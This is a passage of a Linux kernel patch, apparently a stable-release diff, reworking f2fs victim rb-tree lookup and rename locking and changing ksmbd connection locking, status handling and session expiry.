+ 				unsigned long long mtime, unsigned int segno)
+ {
+ 	struct atgc_management *am = &sbi->am;
+-	struct rb_node **p;
++	struct rb_root_cached *root = &am->root;
++	struct rb_node **p = &root->rb_root.rb_node;
+ 	struct rb_node *parent = NULL;
++	struct victim_entry *ve;
+ 	bool left_most = true;
+ 
+-	p = f2fs_lookup_rb_tree_ext(sbi, &am->root, &parent, mtime, &left_most);
+-	attach_victim_entry(sbi, mtime, segno, parent, p, left_most);
++	/* look up rb tree to find parent node */
++	while (*p) {
++		parent = *p;
++		ve = rb_entry(parent, struct victim_entry, rb_node);
++
++		if (mtime < ve->mtime) {
++			p = &(*p)->rb_left;
++		} else {
++			p = &(*p)->rb_right;
++			left_most = false;
++		}
++	}
++
++	ve = __create_victim_entry(sbi, mtime, segno);
++
++	rb_link_node(&ve->rb_node, parent, p);
++	rb_insert_color_cached(&ve->rb_node, root, left_most);
+ }
+ 
+ static void add_victim_entry(struct f2fs_sb_info *sbi,
+@@ -461,19 +516,7 @@ static void add_victim_entry(struct f2fs_sb_info *sbi,
+ 	if (sit_i->dirty_max_mtime - mtime < p->age_threshold)
+ 		return;
+ 
+-	insert_victim_entry(sbi, mtime, segno);
+-}
+-
+-static struct rb_node *lookup_central_victim(struct f2fs_sb_info *sbi,
+-						struct victim_sel_policy *p)
+-{
+-	struct atgc_management *am = &sbi->am;
+-	struct rb_node *parent = NULL;
+-	bool left_most;
+-
+-	f2fs_lookup_rb_tree_ext(sbi, &am->root, &parent, p->age, &left_most);
+-
+-	return parent;
++	__insert_victim_entry(sbi, mtime, segno);
+ }
+ 
+ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+@@ -483,7 +526,6 @@ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+ 	struct atgc_management *am = &sbi->am;
+ 	struct rb_root_cached *root = &am->root;
+ 	struct rb_node *node;
+-	struct rb_entry *re;
+ 	struct victim_entry *ve;
+ 	unsigned long long total_time;
+ 	unsigned long long age, u, accu;
+@@ -510,12 +552,10 @@ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+ 
+ 	node = rb_first_cached(root);
+ next:
+-	re = rb_entry_safe(node, struct rb_entry, rb_node);
+-	if (!re)
++	ve = rb_entry_safe(node, struct victim_entry, rb_node);
++	if (!ve)
+ 		return;
+ 
+-	ve = (struct victim_entry *)re;
+-
+ 	if (ve->mtime >= max_mtime || ve->mtime < min_mtime)
+ 		goto skip;
+ 
+@@ -557,8 +597,6 @@ static void atssr_lookup_victim(struct f2fs_sb_info *sbi,
+ {
+ 	struct sit_info *sit_i = SIT_I(sbi);
+ 	struct atgc_management *am = &sbi->am;
+-	struct rb_node *node;
+-	struct rb_entry *re;
+ 	struct victim_entry *ve;
+ 	unsigned long long age;
+ 	unsigned long long max_mtime = sit_i->dirty_max_mtime;
+@@ -568,25 +606,22 @@ static void atssr_lookup_victim(struct f2fs_sb_info *sbi,
+ 	unsigned int dirty_threshold = max(am->max_candidate_count,
+ 					am->candidate_ratio *
+ 					am->victim_count / 100);
+-	unsigned int cost;
+-	unsigned int iter = 0;
++	unsigned int cost, iter;
+ 	int stage = 0;
+ 
+ 	if (max_mtime < min_mtime)
+ 		return;
+ 	max_mtime += 1;
+ next_stage:
+-	node = lookup_central_victim(sbi, p);
++	iter = 0;
++	ve = __lookup_victim_entry(sbi, p->age);
+ next_node:
+-	re = rb_entry_safe(node, struct rb_entry, rb_node);
+-	if (!re) {
+-		if (stage == 0)
+-			goto skip_stage;
++	if (!ve) {
++		if (stage++ == 0)
++			goto next_stage;
+ 		return;
+ 	}
+ 
+-	ve = (struct victim_entry *)re;
+-
+ 	if (ve->mtime >= max_mtime || ve->mtime < min_mtime)
+ 		goto skip_node;
+ 
+@@ -612,24 +647,20 @@ next_node:
+ 	}
+ skip_node:
+ 	if (iter < dirty_threshold) {
+-		if (stage == 0)
+-			node = rb_prev(node);
+-		else if (stage == 1)
+-			node = rb_next(node);
++		ve = rb_entry(stage == 0 ? rb_prev(&ve->rb_node) :
++					rb_next(&ve->rb_node),
++					struct victim_entry, rb_node);
+ 		goto next_node;
+ 	}
+-skip_stage:
+-	if (stage < 1) {
+-		stage++;
+-		iter = 0;
++
++	if (stage++ == 0)
+ 		goto next_stage;
+-	}
+ }
++
+ static void lookup_victim_by_age(struct f2fs_sb_info *sbi,
+ 						struct victim_sel_policy *p)
+ {
+-	f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-						&sbi->am.root, true));
++	f2fs_bug_on(sbi, !f2fs_check_victim_tree(sbi, &sbi->am.root));
+ 
+ 	if (p->gc_mode == GC_AT)
+ 		atgc_lookup_victim(sbi, p);
+diff --git a/fs/f2fs/gc.h b/fs/f2fs/gc.h
+index 19b956c2d697a..ca84024b9c9e7 100644
+--- a/fs/f2fs/gc.h
++++ b/fs/f2fs/gc.h
+@@ -55,20 +55,10 @@ struct gc_inode_list {
+ 	struct radix_tree_root iroot;
+ };
+ 
+-struct victim_info {
+-	unsigned long long mtime;	/* mtime of section */
+-	unsigned int segno;		/* section No. */
+-};
+-
+ struct victim_entry {
+ 	struct rb_node rb_node;		/* rb node located in rb-tree */
+-	union {
+-		struct {
+-			unsigned long long mtime;	/* mtime of section */
+-			unsigned int segno;		/* segment No. */
+-		};
+-		struct victim_info vi;	/* victim info */
+-	};
++	unsigned long long mtime;	/* mtime of section */
++	unsigned int segno;		/* segment No. */
+ 	struct list_head list;
+ };
+ 
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index 6032589099ce4..156b81daa0cb4 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -998,12 +998,20 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			goto out;
+ 	}
+ 
++	/*
++	 * Copied from ext4_rename: we need to protect against old.inode
++	 * directory getting converted from inline directory format into
++	 * a normal one.
++	 */
++	if (S_ISDIR(old_inode->i_mode))
++		inode_lock_nested(old_inode, I_MUTEX_NONDIR2);
++
+ 	err = -ENOENT;
+ 	old_entry = f2fs_find_entry(old_dir, &old_dentry->d_name, &old_page);
+ 	if (!old_entry) {
+ 		if (IS_ERR(old_page))
+ 			err = PTR_ERR(old_page);
+-		goto out;
++		goto out_unlock_old;
+ 	}
+ 
+ 	if (S_ISDIR(old_inode->i_mode)) {
+@@ -1111,6 +1119,9 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	f2fs_unlock_op(sbi);
+ 
++	if (S_ISDIR(old_inode->i_mode))
++		inode_unlock(old_inode);
++
+ 	if (IS_DIRSYNC(old_dir) || IS_DIRSYNC(new_dir))
+ 		f2fs_sync_fs(sbi->sb, 1);
+ 
+@@ -1125,6 +1136,9 @@ out_dir:
+ 		f2fs_put_page(old_dir_page, 0);
+ out_old:
+ 	f2fs_put_page(old_page, 0);
++out_unlock_old:
++	if (S_ISDIR(old_inode->i_mode))
++		inode_unlock(old_inode);
+ out:
+ 	iput(whiteout);
+ 	return err;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 06991cf643296..097b5e7231d0a 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -263,7 +263,7 @@ retry:
+ 	f2fs_put_dnode(&dn);
+ 
+ 	trace_f2fs_replace_atomic_write_block(inode, F2FS_I(inode)->cow_inode,
+-					index, *old_addr, new_addr, recover);
++			index, old_addr ? *old_addr : 0, new_addr, recover);
+ 	return 0;
+ }
+ 
+@@ -1487,7 +1487,7 @@ retry:
+ 			goto next;
+ 		if (unlikely(dcc->rbtree_check))
+ 			f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-							&dcc->root, false));
++							&dcc->root));
+ 		blk_start_plug(&plug);
+ 		list_for_each_entry_safe(dc, tmp, pend_list, list) {
+ 			f2fs_bug_on(sbi, dc->state != D_PREP);
+@@ -3003,7 +3003,7 @@ next:
+ 	mutex_lock(&dcc->cmd_lock);
+ 	if (unlikely(dcc->rbtree_check))
+ 		f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-							&dcc->root, false));
++							&dcc->root));
+ 
+ 	dc = (struct discard_cmd *)f2fs_lookup_rb_tree_ret(&dcc->root,
+ 					NULL, start,
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index 713e2d97935ff..909150a57aebb 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -829,7 +829,7 @@ void wbc_detach_inode(struct writeback_control *wbc)
+ 		 * is okay.  The main goal is avoiding keeping an inode on
+ 		 * the wrong wb for an extended period of time.
+ 		 */
+-		if (hweight32(history) > WB_FRN_HIST_THR_SLOTS)
++		if (hweight16(history) > WB_FRN_HIST_THR_SLOTS)
+ 			inode_switch_wbs(inode, max_id);
+ 	}
+ 
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index b8f9d627f241d..e3312fbf4c090 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -20,7 +20,7 @@ static DEFINE_MUTEX(init_lock);
+ static struct ksmbd_conn_ops default_conn_ops;
+ 
+ LIST_HEAD(conn_list);
+-DEFINE_RWLOCK(conn_list_lock);
++DECLARE_RWSEM(conn_list_lock);
+ 
+ /**
+  * ksmbd_conn_free() - free resources of the connection instance
+@@ -32,9 +32,9 @@ DEFINE_RWLOCK(conn_list_lock);
+  */
+ void ksmbd_conn_free(struct ksmbd_conn *conn)
+ {
+-	write_lock(&conn_list_lock);
++	down_write(&conn_list_lock);
+ 	list_del(&conn->conns_list);
+-	write_unlock(&conn_list_lock);
++	up_write(&conn_list_lock);
+ 
+ 	xa_destroy(&conn->sessions);
+ 	kvfree(conn->request_buf);
+@@ -56,7 +56,7 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 		return NULL;
+ 
+ 	conn->need_neg = true;
+-	conn->status = KSMBD_SESS_NEW;
++	ksmbd_conn_set_new(conn);
+ 	conn->local_nls = load_nls("utf8");
+ 	if (!conn->local_nls)
+ 		conn->local_nls = load_nls_default();
+@@ -84,9 +84,9 @@ struct ksmbd_conn *ksmbd_conn_alloc(void)
+ 	spin_lock_init(&conn->llist_lock);
+ 	INIT_LIST_HEAD(&conn->lock_list);
+ 
+-	write_lock(&conn_list_lock);
++	down_write(&conn_list_lock);
+ 	list_add(&conn->conns_list, &conn_list);
+-	write_unlock(&conn_list_lock);
++	up_write(&conn_list_lock);
+ 	return conn;
+ }
+ 
+@@ -95,7 +95,7 @@ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+ 	struct ksmbd_conn *t;
+ 	bool ret = false;
+ 
+-	read_lock(&conn_list_lock);
++	down_read(&conn_list_lock);
+ 	list_for_each_entry(t, &conn_list, conns_list) {
+ 		if (memcmp(t->ClientGUID, c->ClientGUID, SMB2_CLIENT_GUID_SIZE))
+ 			continue;
+@@ -103,7 +103,7 @@ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+ 		ret = true;
+ 		break;
+ 	}
+-	read_unlock(&conn_list_lock);
++	up_read(&conn_list_lock);
+ 	return ret;
+ }
+ 
+@@ -149,19 +149,47 @@ int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
+ 	return ret;
+ }
+ 
+-static void ksmbd_conn_lock(struct ksmbd_conn *conn)
++void ksmbd_conn_lock(struct ksmbd_conn *conn)
+ {
+ 	mutex_lock(&conn->srv_mutex);
+ }
+ 
+-static void ksmbd_conn_unlock(struct ksmbd_conn *conn)
++void ksmbd_conn_unlock(struct ksmbd_conn *conn)
+ {
+ 	mutex_unlock(&conn->srv_mutex);
+ }
+ 
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn)
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
+ {
++	struct ksmbd_conn *conn;
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(conn, &conn_list, conns_list) {
++		if (conn->binding || xa_load(&conn->sessions, sess_id))
++			WRITE_ONCE(conn->status, status);
++	}
++	up_read(&conn_list_lock);
++}
++
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
++{
++	struct ksmbd_conn *bind_conn;
++
+ 	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(bind_conn, &conn_list, conns_list) {
++		if (bind_conn == conn)
++			continue;
++
++		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
++		    !ksmbd_conn_releasing(bind_conn) &&
++		    atomic_read(&bind_conn->req_running)) {
++			wait_event(bind_conn->req_running_q,
++				atomic_read(&bind_conn->req_running) == 0);
++		}
++	}
++	up_read(&conn_list_lock);
+ }
+ 
+ int ksmbd_conn_write(struct ksmbd_work *work)
+@@ -245,7 +273,7 @@ bool ksmbd_conn_alive(struct ksmbd_conn *conn)
+ 	if (!ksmbd_server_running())
+ 		return false;
+ 
+-	if (conn->status == KSMBD_SESS_EXITING)
++	if (ksmbd_conn_exiting(conn))
+ 		return false;
+ 
+ 	if (kthread_should_stop())
+@@ -305,7 +333,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		pdu_size = get_rfc1002_len(hdr_buf);
+ 		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
+ 
+-		if (conn->status == KSMBD_SESS_GOOD)
++		if (ksmbd_conn_good(conn))
+ 			max_allowed_pdu_size =
+ 				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
+ 		else
+@@ -314,7 +342,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 		if (pdu_size > max_allowed_pdu_size) {
+ 			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
+ 					pdu_size, max_allowed_pdu_size,
+-					conn->status);
++					READ_ONCE(conn->status));
+ 			break;
+ 		}
+ 
+@@ -362,10 +390,10 @@ int ksmbd_conn_handler_loop(void *p)
+ 	}
+ 
+ out:
++	ksmbd_conn_set_releasing(conn);
+ 	/* Wait till all reference dropped to the Server object*/
+ 	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
+ 
+-
+ 	if (IS_ENABLED(CONFIG_UNICODE))
+ 		utf8_unload(conn->um);
+ 	unload_nls(conn->local_nls);
+@@ -409,7 +437,7 @@ static void stop_sessions(void)
+ 	struct ksmbd_transport *t;
+ 
+ again:
+-	read_lock(&conn_list_lock);
++	down_read(&conn_list_lock);
+ 	list_for_each_entry(conn, &conn_list, conns_list) {
+ 		struct task_struct *task;
+ 
+@@ -418,14 +446,14 @@ again:
+ 		if (task)
+ 			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
+ 				    task->comm, task_pid_nr(task));
+-		conn->status = KSMBD_SESS_EXITING;
++		ksmbd_conn_set_exiting(conn);
+ 		if (t->ops->shutdown) {
+-			read_unlock(&conn_list_lock);
++			up_read(&conn_list_lock);
+ 			t->ops->shutdown(t);
+-			read_lock(&conn_list_lock);
++			down_read(&conn_list_lock);
+ 		}
+ 	}
+-	read_unlock(&conn_list_lock);
++	up_read(&conn_list_lock);
+ 
+ 	if (!list_empty(&conn_list)) {
+ 		schedule_timeout_interruptible(HZ / 10); /* 100ms */
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+index 0e3a848defaf3..ad8dfaa48ffb3 100644
+--- a/fs/ksmbd/connection.h
++++ b/fs/ksmbd/connection.h
+@@ -26,7 +26,8 @@ enum {
+ 	KSMBD_SESS_GOOD,
+ 	KSMBD_SESS_EXITING,
+ 	KSMBD_SESS_NEED_RECONNECT,
+-	KSMBD_SESS_NEED_NEGOTIATE
++	KSMBD_SESS_NEED_NEGOTIATE,
++	KSMBD_SESS_RELEASING
+ };
+ 
+ struct ksmbd_stats {
+@@ -140,10 +141,10 @@ struct ksmbd_transport {
+ #define KSMBD_TCP_PEER_SOCKADDR(c)	((struct sockaddr *)&((c)->peer_addr))
+ 
+ extern struct list_head conn_list;
+-extern rwlock_t conn_list_lock;
++extern struct rw_semaphore conn_list_lock;
+ 
+ bool ksmbd_conn_alive(struct ksmbd_conn *conn);
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn);
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id);
+ struct ksmbd_conn *ksmbd_conn_alloc(void);
+ void ksmbd_conn_free(struct ksmbd_conn *conn);
+ bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c);
+@@ -162,6 +163,8 @@ void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
+ int ksmbd_conn_handler_loop(void *p);
+ int ksmbd_conn_transport_init(void);
+ void ksmbd_conn_transport_destroy(void);
++void ksmbd_conn_lock(struct ksmbd_conn *conn);
++void ksmbd_conn_unlock(struct ksmbd_conn *conn);
+ 
+ /*
+  * WARNING
+@@ -169,43 +172,60 @@ void ksmbd_conn_transport_destroy(void);
+  * This is a hack. We will move status to a proper place once we land
+  * a multi-sessions support.
+  */
+-static inline bool ksmbd_conn_good(struct ksmbd_work *work)
++static inline bool ksmbd_conn_good(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_GOOD;
++	return READ_ONCE(conn->status) == KSMBD_SESS_GOOD;
+ }
+ 
+-static inline bool ksmbd_conn_need_negotiate(struct ksmbd_work *work)
++static inline bool ksmbd_conn_need_negotiate(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_NEED_NEGOTIATE;
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_NEGOTIATE;
+ }
+ 
+-static inline bool ksmbd_conn_need_reconnect(struct ksmbd_work *work)
++static inline bool ksmbd_conn_need_reconnect(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_NEED_RECONNECT;
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_RECONNECT;
+ }
+ 
+-static inline bool ksmbd_conn_exiting(struct ksmbd_work *work)
++static inline bool ksmbd_conn_exiting(struct ksmbd_conn *conn)
+ {
+-	return work->conn->status == KSMBD_SESS_EXITING;
++	return READ_ONCE(conn->status) == KSMBD_SESS_EXITING;
+ }
+ 
+-static inline void ksmbd_conn_set_good(struct ksmbd_work *work)
++static inline bool ksmbd_conn_releasing(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_GOOD;
++	return READ_ONCE(conn->status) == KSMBD_SESS_RELEASING;
+ }
+ 
+-static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_new(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_NEED_NEGOTIATE;
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEW);
+ }
+ 
+-static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_good(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_NEED_RECONNECT;
++	WRITE_ONCE(conn->status, KSMBD_SESS_GOOD);
+ }
+ 
+-static inline void ksmbd_conn_set_exiting(struct ksmbd_work *work)
++static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_conn *conn)
+ {
+-	work->conn->status = KSMBD_SESS_EXITING;
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_NEGOTIATE);
+ }
++
++static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_RECONNECT);
++}
++
++static inline void ksmbd_conn_set_exiting(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_EXITING);
++}
++
++static inline void ksmbd_conn_set_releasing(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_RELEASING);
++}
++
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status);
+ #endif /* __CONNECTION_H__ */
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+index f19de20c2960c..f07a05f376513 100644
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ b/fs/ksmbd/mgmt/tree_connect.c
+@@ -137,6 +137,9 @@ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+ 	struct ksmbd_tree_connect *tc;
+ 	unsigned long id;
+ 
++	if (!sess)
++		return -EINVAL;
++
+ 	xa_for_each(&sess->tree_conns, id, tc)
+ 		ret |= ksmbd_tree_conn_disconnect(sess, tc);
+ 	xa_destroy(&sess->tree_conns);
+diff --git a/fs/ksmbd/mgmt/user_session.c b/fs/ksmbd/mgmt/user_session.c
+index 92b1603b5abeb..ea4b56d570fbb 100644
+--- a/fs/ksmbd/mgmt/user_session.c
++++ b/fs/ksmbd/mgmt/user_session.c
+@@ -30,15 +30,15 @@ struct ksmbd_session_rpc {
+ 
+ static void free_channel_list(struct ksmbd_session *sess)
+ {
+-	struct channel *chann, *tmp;
++	struct channel *chann;
++	unsigned long index;
+ 
+-	write_lock(&sess->chann_lock);
+-	list_for_each_entry_safe(chann, tmp, &sess->ksmbd_chann_list,
+-				 chann_list) {
+-		list_del(&chann->chann_list);
++	xa_for_each(&sess->ksmbd_chann_list, index, chann) {
++		xa_erase(&sess->ksmbd_chann_list, index);
+ 		kfree(chann);
+ 	}
+-	write_unlock(&sess->chann_lock);
++
++	xa_destroy(&sess->ksmbd_chann_list);
+ }
+ 
+ static void __session_rpc_close(struct ksmbd_session *sess,
+@@ -153,10 +153,6 @@ void ksmbd_session_destroy(struct ksmbd_session *sess)
+ 	if (!sess)
+ 		return;
+ 
+-	down_write(&sessions_table_lock);
+-	hash_del(&sess->hlist);
+-	up_write(&sessions_table_lock);
+-
+ 	if (sess->user)
+ 		ksmbd_free_user(sess->user);
+ 
+@@ -174,76 +170,101 @@ static struct ksmbd_session *__session_lookup(unsigned long long id)
+ 	struct ksmbd_session *sess;
+ 
+ 	hash_for_each_possible(sessions_table, sess, hlist, id) {
+-		if (id == sess->id)
++		if (id == sess->id) {
++			sess->last_active = jiffies;
+ 			return sess;
++		}
+ 	}
+ 	return NULL;
+ }
+ 
++static void ksmbd_expire_session(struct ksmbd_conn *conn)
++{
++	unsigned long id;
++	struct ksmbd_session *sess;
++
++	down_write(&sessions_table_lock);
++	xa_for_each(&conn->sessions, id, sess) {
++		if (sess->state != SMB2_SESSION_VALID ||
++		    time_after(jiffies,
++			       sess->last_active + SMB2_SESSION_TIMEOUT)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++			continue;
++		}
++	}
++	up_write(&sessions_table_lock);
++}
++
+ int ksmbd_session_register(struct ksmbd_conn *conn,
+ 			   struct ksmbd_session *sess)
+ {
+ 	sess->dialect = conn->dialect;
+ 	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
++	ksmbd_expire_session(conn);
+ 	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
+ }
+ 
+ static int ksmbd_chann_del(struct ksmbd_conn *conn, struct ksmbd_session *sess)
+ {
+-	struct channel *chann, *tmp;
+-
+-	write_lock(&sess->chann_lock);
+-	list_for_each_entry_safe(chann, tmp, &sess->ksmbd_chann_list,
+-				 chann_list) {
+-		if (chann->conn == conn) {
+-			list_del(&chann->chann_list);
+-			kfree(chann);
+-			write_unlock(&sess->chann_lock);
+-			return 0;
+-		}
+-	}
+-	write_unlock(&sess->chann_lock);
++	struct channel *chann;
+ 
+-	return -ENOENT;
++	chann = xa_erase(&sess->ksmbd_chann_list, (long)conn);
++	if (!chann)
++		return -ENOENT;
++
++	kfree(chann);
++	return 0;
+ }
+ 
+ void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+ {
+ 	struct ksmbd_session *sess;
++	unsigned long id;
+ 
++	down_write(&sessions_table_lock);
+ 	if (conn->binding) {
+ 		int bkt;
++		struct hlist_node *tmp;
+ 
+-		down_write(&sessions_table_lock);
+-		hash_for_each(sessions_table, bkt, sess, hlist) {
+-			if (!ksmbd_chann_del(conn, sess)) {
+-				up_write(&sessions_table_lock);
+-				goto sess_destroy;
++		hash_for_each_safe(sessions_table, bkt, tmp, sess, hlist) {
++			if (!ksmbd_chann_del(conn, sess) &&
++			    xa_empty(&sess->ksmbd_chann_list)) {
++				hash_del(&sess->hlist);
++				ksmbd_session_destroy(sess);
+ 			}
+ 		}
+-		up_write(&sessions_table_lock);
+-	} else {
+-		unsigned long id;
+-
+-		xa_for_each(&conn->sessions, id, sess) {
+-			if (!ksmbd_chann_del(conn, sess))
+-				goto sess_destroy;
+-		}
+ 	}
+ 
+-	return;
++	xa_for_each(&conn->sessions, id, sess) {
++		unsigned long chann_id;
++		struct channel *chann;
++
++		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
++			if (chann->conn != conn)
++				ksmbd_conn_set_exiting(chann->conn);
++		}
+ 
+-sess_destroy:
+-	if (list_empty(&sess->ksmbd_chann_list)) {
+-		xa_erase(&conn->sessions, sess->id);
+-		ksmbd_session_destroy(sess);
++		ksmbd_chann_del(conn, sess);
++		if (xa_empty(&sess->ksmbd_chann_list)) {
++			xa_erase(&conn->sessions, sess->id);
++			hash_del(&sess->hlist);
++			ksmbd_session_destroy(sess);
++		}
+ 	}
++	up_write(&sessions_table_lock);
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+ 					   unsigned long long id)
+ {
+-	return xa_load(&conn->sessions, id);
++	struct ksmbd_session *sess;
++
++	sess = xa_load(&conn->sessions, id);
++	if (sess)
++		sess->last_active = jiffies;
++	return sess;
+ }
+ 
+ struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+@@ -252,6 +273,8 @@ struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+ 
+ 	down_read(&sessions_table_lock);
+ 	sess = __session_lookup(id);
++	if (sess)
++		sess->last_active = jiffies;
+ 	up_read(&sessions_table_lock);
+ 
+ 	return sess;
+@@ -320,6 +343,9 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	struct ksmbd_session *sess;
+ 	int ret;
+ 
++	if (protocol != CIFDS_SESSION_FLAG_SMB2)
++		return NULL;
++
+ 	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
+ 	if (!sess)
+ 		return NULL;
+@@ -327,32 +353,24 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	if (ksmbd_init_file_table(&sess->file_table))
+ 		goto error;
+ 
++	sess->last_active = jiffies;
++	sess->state = SMB2_SESSION_IN_PROGRESS;
+ 	set_session_flag(sess, protocol);
+ 	xa_init(&sess->tree_conns);
+-	INIT_LIST_HEAD(&sess->ksmbd_chann_list);
++	xa_init(&sess->ksmbd_chann_list);
+ 	INIT_LIST_HEAD(&sess->rpc_handle_list);
+ 	sess->sequence_number = 1;
+-	rwlock_init(&sess->chann_lock);
+-
+-	switch (protocol) {
+-	case CIFDS_SESSION_FLAG_SMB2:
+-		ret = __init_smb2_session(sess);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-		break;
+-	}
+ 
++	ret = __init_smb2_session(sess);
+ 	if (ret)
+ 		goto error;
+ 
+ 	ida_init(&sess->tree_conn_ida);
+ 
+-	if (protocol == CIFDS_SESSION_FLAG_SMB2) {
+-		down_write(&sessions_table_lock);
+-		hash_add(sessions_table, &sess->hlist, sess->id);
+-		up_write(&sessions_table_lock);
+-	}
++	down_write(&sessions_table_lock);
++	hash_add(sessions_table, &sess->hlist, sess->id);
++	up_write(&sessions_table_lock);
++
+ 	return sess;
+ 
+ error:
+diff --git a/fs/ksmbd/mgmt/user_session.h b/fs/ksmbd/mgmt/user_session.h
+index 8934b8ee275ba..51f38e5b61abb 100644
+--- a/fs/ksmbd/mgmt/user_session.h
++++ b/fs/ksmbd/mgmt/user_session.h
+@@ -21,7 +21,6 @@ struct ksmbd_file_table;
+ struct channel {
+ 	__u8			smb3signingkey[SMB3_SIGN_KEY_SIZE];
+ 	struct ksmbd_conn	*conn;
+-	struct list_head	chann_list;
+ };
+ 
+ struct preauth_session {
+@@ -50,8 +49,7 @@ struct ksmbd_session {
+ 	char				sess_key[CIFS_KEY_SIZE];
+ 
+ 	struct hlist_node		hlist;
+-	rwlock_t			chann_lock;
+-	struct list_head		ksmbd_chann_list;
++	struct xarray			ksmbd_chann_list;
+ 	struct xarray			tree_conns;
+ 	struct ida			tree_conn_ida;
+ 	struct list_head		rpc_handle_list;
+@@ -61,6 +59,7 @@ struct ksmbd_session {
+ 	__u8				smb3signingkey[SMB3_SIGN_KEY_SIZE];
+ 
+ 	struct ksmbd_file_table		file_table;
++	unsigned long			last_active;
+ };
+ 
+ static inline int test_session_flag(struct ksmbd_session *sess, int bit)
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index cd8a873347a79..dc76d7cf241f0 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -93,7 +93,8 @@ static inline int check_conn_state(struct ksmbd_work *work)
+ {
+ 	struct smb_hdr *rsp_hdr;
+ 
+-	if (ksmbd_conn_exiting(work) || ksmbd_conn_need_reconnect(work)) {
++	if (ksmbd_conn_exiting(work->conn) ||
++	    ksmbd_conn_need_reconnect(work->conn)) {
+ 		rsp_hdr = work->response_buf;
+ 		rsp_hdr->Status.CifsError = STATUS_CONNECTION_DISCONNECTED;
+ 		return 1;
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index decaef3592f43..53badff17efaa 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
